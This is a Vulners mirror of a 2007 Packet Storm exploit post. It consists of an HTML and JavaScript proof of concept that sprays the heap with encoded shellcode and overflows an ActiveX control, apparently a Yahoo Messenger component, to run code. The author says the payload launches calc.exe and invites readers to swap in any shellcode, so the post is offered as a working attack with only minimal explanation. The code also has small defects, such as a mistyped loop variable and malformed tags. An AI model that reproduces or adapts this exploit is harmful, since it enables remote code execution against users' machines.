Lucene search
K

ym1.txt

🗓️ 10 Jun 2007 00:00:00Reported by DannyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

45 minutes of fuzzing resulted in a shellcode execution vulnerability. Refer to link for more details

Code
`<html>  
<!--  
45 minutes of fuzzing!  
Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!  
  
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856  
maybe more vulz!  
  
Greetz to: str0ke and shinnai!  
-->  
<html>  
<script>  
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'  
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +  
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +  
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +  
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +  
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +  
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +  
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +  
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +  
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +  
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +   
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +  
"%uCC4A%uD0FF");   
bigblock = unescape("%u9090%u9090");   
headersize = 20;   
slackspace = headersize+shellcode.length  
while (bigblock.length<slackspace) bigblock+=bigblock;   
fillblock = bigblock.substring(0, slackspace);   
block = bigblock.substring(0, bigblock.length-slackspace);   
while(block.length+slackspace<0x40000) block = block+block+fillblock;   
memory = new Array();   
for (x=0; xi<800; x++) memory[x] = block + shellcode;   
var buffer = '\x0a';   
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';   
target.server = buffer;   
target.initialize();   
target.send();   
</script>  
</html>  
sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111  
  
---------------------------------  
Luggage? GPS? Comic books?   
Check out fitting gifts for grads at Yahoo! Search.`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
33